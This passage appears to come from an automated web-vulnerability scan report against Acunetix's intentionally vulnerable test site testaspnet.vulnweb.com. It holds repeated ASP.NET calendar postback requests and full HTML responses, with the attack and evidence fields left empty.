05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8161')" style="color:Black" title="May 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8162')" style="color:Black" title="May 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1139 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,139 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8433&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBACEPnA9sIHgJTRBYBBgAAcm2wBNsIZGRk92HWYgE0zB6j99VHj6I%2FtPSiu60%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwK82%2B%2FTBQLQp5LlBALTp%2BrACAKN96ipBgKN96ipBgLmnbveCQLmnbveCQLmna%2F1AgLmna%2F1AgLmncOJCgLmncOJCgLmnfesAwLmnfesAwLmnevDDALmnevDDALmnZ%2FmBQLmnZ%2FmBQLmnbO9DQLmnbO9DQLmnafQBgLmnafQBgLmnZu5AwLmnZu5AwLmnY%2FcDALmnY%2FcDAL7pJnFDwL7pJnFDwL7pI2YBwL7pI2YBwL7pKE%2FAvukoT8C%2B6TV0wkC%2B6TV0wkC%2B6TJ9gIC%2B6TJ9gIC%2B6T9jQoC%2B6T9jQoC%2B6SRoAMC%2B6SRoAMC%2B6SFxwwC%2B6SFxwwC%2B6T5rAkC%2B6T5rAkC%2B6TtwwIC%2B6TtwwIC3Mv%2F6AUC3Mv%2F6AUC3MuTjw0C3MuTjw0C3MuHogYC3MuHogYC3Mu7%2BQ8C3Mu7%2BQ8C3MuvnAcC3MuvnAcC3MvDMALcy8MwAtzL99cJAtzL99cJAtzL6%2BoCAtzL6%2BoCAtzL39MPAtzL39MPAtzL8%2FYIAtzL8%2FYIArHS3Z8KArHS3Z8KArHS8bIDArHS8bIDArHS5ckMArHS5ckMArHSmewFArHSmewFArHSjYMNArHSjYMNArHSoaYGArHSoaYGArHS1foPArHS1foPArHSyZEHArHSyZEHArHSvfkFArHSvfkFArHS0Z0NArHS0Z0NAor5owUCivmjBW6xXt6QDb1X2eUHc6Rr6csqR8QG
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:54:09 GMT Content-Length: 12583
Response Body - size: 12,583 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBACEPnA9sIHgJTRBYBBgAAcm2wBNsIZGRk92HWYgE0zB6j99VHj6I/tPSiu60=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwK82+/TBQLQp5LlBALTp+rACAKN96ipBgKN96ipBgLmnbveCQLmnbveCQLmna/1AgLmna/1AgLmncOJCgLmncOJCgLmnfesAwLmnfesAwLmnevDDALmnevDDALmnZ/mBQLmnZ/mBQLmnbO9DQLmnbO9DQLmnafQBgLmnafQBgLmnZu5AwLmnZu5AwLmnY/cDALmnY/cDAL7pJnFDwL7pJnFDwL7pI2YBwL7pI2YBwL7pKE/AvukoT8C+6TV0wkC+6TV0wkC+6TJ9gIC+6TJ9gIC+6T9jQoC+6T9jQoC+6SRoAMC+6SRoAMC+6SFxwwC+6SFxwwC+6T5rAkC+6T5rAkC+6TtwwIC+6TtwwIC3Mv/6AUC3Mv/6AUC3MuTjw0C3MuTjw0C3MuHogYC3MuHogYC3Mu7+Q8C3Mu7+Q8C3MuvnAcC3MuvnAcC3MvDMALcy8MwAtzL99cJAtzL99cJAtzL6+oCAtzL6+oCAtzL39MPAtzL39MPAtzL8/YIAtzL8/YIArHS3Z8KArHS3Z8KArHS8bIDArHS8bIDArHS5ckMArHS5ckMArHSmewFArHSmewFArHSjYMNArHSjYMNArHSoaYGArHSoaYGArHS1foPArHS1foPArHSyZEHArHSyZEHArHSvfkFArHSvfkFArHS0Z0NArHS0Z0NAor5owUCivmjBW6xXt6QDb1X2eUHc6Rr6csqR8QG" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">February 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8460')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8429')" style="color:Black" title="January 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8430')" style="color:Black" title="January 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8431')" style="color:Black" title="January 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8432')" style="color:Black" title="February 01">1</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8433')" style="color:White" title="February 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8434')" style="color:Black" title="February 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8435')" style="color:Black" title="February 04">4</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8436')" style="color:Black" title="February 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8437')" style="color:Black" title="February 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8438')" style="color:Black" title="February 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8439')" style="color:Black" title="February 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8440')" style="color:Black" title="February 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8441')" style="color:Black" title="February 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8442')" style="color:Black" title="February 11">11</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8443')" style="color:Black" title="February 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8444')" style="color:Black" title="February 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8445')" style="color:Black" title="February 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8446')" style="color:Black" title="February 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8447')" style="color:Black" title="February 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8448')" style="color:Black" title="February 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8449')" style="color:Black" title="February 18">18</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8450')" style="color:Black" title="February 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8451')" style="color:Black" title="February 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8452')" style="color:Black" title="February 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8453')" style="color:Black" title="February 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8454')" style="color:Black" title="February 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8455')" style="color:Black" title="February 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8456')" style="color:Black" title="February 25">25</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8457')" style="color:Black" title="February 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8458')" style="color:Black" title="February 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8459')" style="color:Black" title="February 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8460')" style="color:Black" title="March 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8461')" style="color:Black" title="March 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8462')" style="color:Black" title="March 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8463')" style="color:Black" title="March 04">4</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8464')" style="color:Black" title="March 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8465')" style="color:Black" title="March 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8466')" style="color:Black" title="March 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8467')" style="color:Black" title="March 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8468')" style="color:Black" title="March 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8469')" style="color:Black" title="March 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8470')" style="color:Black" title="March 11">11</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1159 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,159 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8253&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABsdQc9oIHgJTRBYBBgAAF5s%2Bd9oIZGRkaHAFmjk7yG9Xga3w3wdaeLZ8VQU%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwK857WvCQKcisLvAQLiidrKBQL7pJ3HDAL7pJ3HDAL7pPGsCQL7pPGsCQL7pOXDAgL7pOXDAgLcy%2FfoBQLcy%2FfoBQLcy%2BuPDQLcy%2BuPDQLcy5%2BiBgLcy5%2BiBgLcy7P5DwLcy7P5DwLcy6ecBwLcy6ecBwLcy9swAtzL2zAC3MvP1wkC3MvP1wkC3Mvj6gIC3Mvj6gIC3MvX0w8C3MvX0w8C3MvL9ggC3MvL9ggCsdLVnwoCsdLVnwoCsdLJsgMCsdLJsgMCsdL9yQwCsdL9yQwCsdKR7AUCsdKR7AUCsdKFgw0CsdKFgw0CsdK5pgYCsdK5pgYCsdKt%2FQ8CsdKt%2FQ8CsdLBkQcCsdLBkQcCsdK1%2BQUCsdK1%2BQUCsdKpnA0CsdKpnA0Civm7BQKK%2BbsFAor5r9gJAor5r9gJAor5w%2FwCAor5w%2FwCAor595MKAor595MKAor567YDAor567YDAor5n80MAor5n80MAor5s%2BAFAor5s%2BAFAor5p4cNAor5p4cNAor5m%2BwLAor5m%2BwLAor5j4MDAor5j4MDAr%2BT%2B8QJAr%2BT%2B8QJAr%2BT75sBAr%2BT75sBAr%2BTg74KAr%2BTg74KAr%2BTt9UDAr%2BTt9UDAr%2BTq%2BgMAr%2BTq%2BgMAr%2BT34wEAr%2BT34wEAr%2BT86MNAr%2BT86MNAr%2BT58YGAr%2BT58YGAr%2BT268DAr%2BT268DSdUVdURDVljuq8webdoJ2U9xzy4%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:55:14 GMT Content-Length: 12565
Response Body - size: 12,565 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABsdQc9oIHgJTRBYBBgAAF5s+d9oIZGRkaHAFmjk7yG9Xga3w3wdaeLZ8VQU=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwK857WvCQKcisLvAQLiidrKBQL7pJ3HDAL7pJ3HDAL7pPGsCQL7pPGsCQL7pOXDAgL7pOXDAgLcy/foBQLcy/foBQLcy+uPDQLcy+uPDQLcy5+iBgLcy5+iBgLcy7P5DwLcy7P5DwLcy6ecBwLcy6ecBwLcy9swAtzL2zAC3MvP1wkC3MvP1wkC3Mvj6gIC3Mvj6gIC3MvX0w8C3MvX0w8C3MvL9ggC3MvL9ggCsdLVnwoCsdLVnwoCsdLJsgMCsdLJsgMCsdL9yQwCsdL9yQwCsdKR7AUCsdKR7AUCsdKFgw0CsdKFgw0CsdK5pgYCsdK5pgYCsdKt/Q8CsdKt/Q8CsdLBkQcCsdLBkQcCsdK1+QUCsdK1+QUCsdKpnA0CsdKpnA0Civm7BQKK+bsFAor5r9gJAor5r9gJAor5w/wCAor5w/wCAor595MKAor595MKAor567YDAor567YDAor5n80MAor5n80MAor5s+AFAor5s+AFAor5p4cNAor5p4cNAor5m+wLAor5m+wLAor5j4MDAor5j4MDAr+T+8QJAr+T+8QJAr+T75sBAr+T75sBAr+Tg74KAr+Tg74KAr+Tt9UDAr+Tt9UDAr+Tq+gMAr+Tq+gMAr+T34wEAr+T34wEAr+T86MNAr+T86MNAr+T58YGAr+T58YGAr+T268DAr+T268DSdUVdURDVljuq8webdoJ2U9xzy4=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8217')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">August 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8279')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:White" title="August 06">6</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8254')" style="color:Black" title="August 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8255')" style="color:Black" title="August 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8256')" style="color:Black" title="August 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8257')" style="color:Black" title="August 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8258')" style="color:Black" title="August 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8259')" style="color:Black" title="August 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8260')" style="color:Black" title="August 13">13</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8261')" style="color:Black" title="August 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8262')" style="color:Black" title="August 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8263')" style="color:Black" title="August 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8264')" style="color:Black" title="August 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8265')" style="color:Black" title="August 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8266')" style="color:Black" title="August 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8267')" style="color:Black" title="August 20">20</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8268')" style="color:Black" title="August 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8269')" style="color:Black" title="August 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8270')" style="color:Black" title="August 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8271')" style="color:Black" title="August 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8272')" style="color:Black" title="August 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8273')" style="color:Black" title="August 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8274')" style="color:Black" title="August 27">27</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8275')" style="color:Black" title="August 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8276')" style="color:Black" title="August 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8277')" style="color:Black" title="August 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8278')" style="color:Black" title="August 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8279')" style="color:Black" title="September 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8280')" style="color:Black" title="September 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8281')" style="color:Black" title="September 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8282')" style="color:Black" title="September 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8283')" style="color:Black" title="September 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8284')" style="color:Black" title="September 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8285')" style="color:Black" title="September 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8286')" style="color:Black" title="September 08">8</a></td><td 